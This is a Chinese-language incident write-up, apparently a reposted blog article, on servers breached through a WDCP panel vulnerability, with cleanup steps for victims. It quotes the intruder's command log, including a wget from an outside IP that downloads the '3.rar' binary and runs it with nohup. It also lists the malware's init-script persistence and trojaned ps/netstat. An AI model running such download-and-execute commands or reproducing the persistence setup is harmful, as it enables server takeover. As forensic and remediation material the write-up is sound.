WDCP漏洞入侵后续整理

Share To Facebook Twitter

联系到我的几位客户都是相同的情况,相同的日期(10月27日)由相同的IP(117.42.52.36,扫了下,可以确定这个IP不是服务器主机,至于是黑 客自己的电脑还是肉鸡就不得而知了)利用wdcp漏洞入侵。
从日志来看,入侵是由工具自动化完成的。

黑 客入侵后留下的命令记录如下:
cd /root
wget http://60.172.229.178/3.rar
chmod 0755 /root/3.rar
chmod 0755 ./3.rar
/dev/null 2>&1 &
nohup ./3.rar > /dev/null 2>&1 &

(3.rar MD5为:522a3b05908c40e37c08e8fb14171dfc)

下面主要写一下3.rar(注意这是个二进制程序,而非压缩包)执行后修改过的文件,给大家修复提供参考。

创建文件:
/etc/rc.d/init.d/DbSecuritySdt
/etc/rc.d/rc1.d/S97DbSecuritySdt
/etc/rc.d/rc2.d/S97DbSecuritySdt
/etc/rc.d/rc3.d/S97DbSecuritySdt
/etc/rc.d/rc4.d/S97DbSecuritySdt
/etc/rc.d/rc5.d/S97DbSecuritySdt
上面的文件内容都一样,内容为:
#!/bin/bash
/root/3.rar
目的是让3.rar重启后自动运行。

IT网,http://www.it.net.cn

创建文件:
/usr/bin/bsd-port/getty
文件内容和3.rar相同。
同目录下还有conf.n和getty.lock。

创建文件:
/usr/bin/acpid
文件内容和3.rar相同。

创建文件:
/etc/rc.d/init.d/selinux
/etc/rc.d/rc1.d/S99selinux
/etc/rc.d/rc2.d/S99selinux
/etc/rc.d/rc3.d/S99selinux
/etc/rc.d/rc4.d/S99selinux
/etc/rc.d/rc5.d/S99selinux
文件内容如下:
#!/bin/bash
/usr/bin/bsd-port/getty
目的还是让恶意程序在系统重启后自动行动。

创建目录:
/usr/bin/dpkgd/
目录下有二个程序:
netstat  ps
这个是系统中正常的程序,转移到这里做了备份。

替换掉了系统中的/bin/ps和/bin/netstat。
替换后的程序在执行后可以隐藏掉恶意程序的相关执行信息,并且加入了复活恶意程序的功能。

文件操作到此结束。

如果确定和本文描述的入侵情况完全相同,可以用下面的命令修复:
killall 3.rar getty acpid
rm -f /etc/rc.d/rc*.d/S97DbSecuritySdt Linux学习,http:// linux.it.net.cn
rm -f /etc/rc.d/init.d/DbSecuritySdt
rm -rf /usr/bin/bsd-port/
rm -f /usr/bin/acpid
rm -f /etc/init.d/selinux
rm -f /etc/rc.d/rc*.d/S99selinux
rm -f /bin/ps /bin/netstat
cp /usr/bin/dpkgd/ps /bin/
cp /usr/bin/dpkgd/netstat /bin/

这次的WDCP漏洞中,这个3.rar做的恶比较多,但它并不是唯一的做恶者(其他的人或者程序会留下其他的东西,不在上面的描述范围内)。
最早的入侵痕迹在10月初已经出现,3.rar出现的比较晚,但是出现的多,而且表面上造成的影响比较大(对外扫描肯定会导致机器被封,在国外某些主机商甚至会BAN帐号)。

全文完。 (责任编辑:IT)

发表评论